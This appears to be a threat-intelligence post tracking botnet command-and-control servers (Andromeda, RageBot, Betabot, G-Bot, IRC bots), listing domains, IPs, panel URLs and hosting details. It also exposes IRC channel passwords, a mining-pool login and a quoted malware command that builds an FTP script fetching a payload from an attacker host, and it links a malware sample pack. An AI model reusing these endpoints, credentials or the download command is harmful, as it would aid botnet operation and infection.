This is from the anonymous guy here Resolved : [euclid.es] To [188.190.98.30] Panel: hxxp://euclid.es/147/order.php Download URLs hxxp://euclid.es/mnr1.exe hosting infos: http://whois.domaintools.com/188.190.98.30
a55555a.dontexist.com(Andromeda Bot hosted in France Roubaix Ovh Systems)
This is from the anonymous guy here Resolved : [a55555a.dontexist.com] To [188.165.87.109] Panel: a55555a.dontexist.com/XMhXautVnLzlIC/image.php hosting infos: http://whois.domaintools.com/188.165.87.109
rageevo.sytes.net(RageBot hosted in Chile Santiago Gtd Internet S.a.)
Resolved : [rageevo.sytes.net] To [190.196.122.227] PASS pass NICK raGe|PkfUmcvBta USER ofmfn “fo8.net” “rage” :ofmfn JOIN #Ev0-h4cK# ev0h4ck Now talking in #Ev0-h4cK# Topic On: [ #Ev0-h4cK# ] [ !xpl 100 1 190 -b 2 0 ] Topic By: [DJ-L0rD|Ev0| ] Modes On: [#Ev0-h4cK# ] [ +smntrul 500 ] samples here:cmd /c echo open windowsupd.serveftp.com 21 >>Read more...
betabot.zapto.org (Betabot http botnet hosted by linode.com)
Resolved betabot.zapto.org to 106.187.88.52 Server: betabot.zapto.org Gate file: /beta/order.php Alternate domains: 7obby.com betabu.zapto.org Hosting infos: http://whois.domaintools.com/106.187.88.52
steroids-buy-anabolic.com (Betabot http botnet hosted by balticservers.com)
Resolved steroids-buy-anabolic.com to 5.199.167.132 Server: steroids-buy-anabolic.com Gate file: order.php There don’t appear to be any alternate domains for this bot. The domain previously hosted panels for ddos bots. Hosting infos: http://whois.domaintools.com/5.199.167.132
rocksolidswag.no-ip.org (Betabot http botnet hosted by ecatel.net)
Resolved rocksolidswag.no-ip.org to 89.248.160.146 Server: rocksolidswag.no-ip.org Gate file: /swag/order.php Alternate domains: swazers.com pirateleaks.us lilseizurespizza.com trytoperceive.me The owner is mining some bitcoins: http://askaa_worker:penis@us3.eclipsemc.com:8337 Hosting infos: http://whois.domaintools.com/89.248.160.146
infuego.ru (Betabot http botnet hosted by altushost.com)
Resolved infuego.ru to 37.46.127.164 Server: infuego.ru Gate file: /forums/order.php Alternate domains: virtualdreams.ruwinyl.wsoffshored.suwinyle.su Hosting info: http://whois.domaintools.com/37.46.127.164
h.opennews.su (irc botnet hosted by qhoster.com)
Resolved h.opennews.su to 5.45.181.254 Server: h.opennews.su Port: 9000 Channel: #sp Channel password: yop Topic for #sp is: !wB/smZJsKbDADvo5ab8sIF/r5RP7kkXfEsreBMH+9hiVs3ilngzFHh0Ph9sbgtC/EeqYw5x0Vj2IqRyb/knFS+LUzo6bf3cW/A1SyUXkVxz8ERDPS2K/qHObIS3TFyR2JAiWdnWc82S3KnAwUHQFMEb6h/kQqB9TcZElsKS4BnyDiGp1B19crjVgBes7+ilkHVmFLRRgoSPyUBx71ioiUporVdeOIEUhA547CIbp0odHxRQ41LK9wPz13N8KYZx6/QE//rZhBqCorPJqg3w= Topic for #sp set by SNK at Thu Apr 04 06:16:09 2013 Example bot nick: n{USA-XPx86u}gjekbowg Alternate domains: f.eastmoon.pl gigasbh.org gigasphere.su o.dailyradio.su photobeat.su s.richlab.pl uranus.kei.su xixbh.com xixbh.net You may recognize some of the domains from previous postsRead more...
70mb samples
Multiple samples from diferent sources including irc,http bots,banking trojans,rats etc have fun analysing Source
klev11.ru(G-Bot hosted in Russian Federation Moscow Mchost.ru)
Resolved : [klev11.ru] To [178.208.83.19] Panel here:hxxp://klev11.ru/g/login.php Sample here hosting infos: http://whois.domaintools.com/178.208.83.19